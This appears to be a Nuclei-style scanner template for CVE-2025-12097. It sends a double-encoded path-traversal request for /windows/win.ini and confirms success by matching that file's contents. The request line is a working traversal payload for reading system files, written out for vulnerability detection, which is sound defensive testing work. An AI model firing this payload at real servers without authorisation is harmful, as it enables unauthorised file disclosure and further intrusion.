id: CVE-2025-12097

info:
  name: CVE-2025-12097
  author: matejsmycka
  severity: high
  description: |
    Fuzzing for /windows/win.ini.
  tags: vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and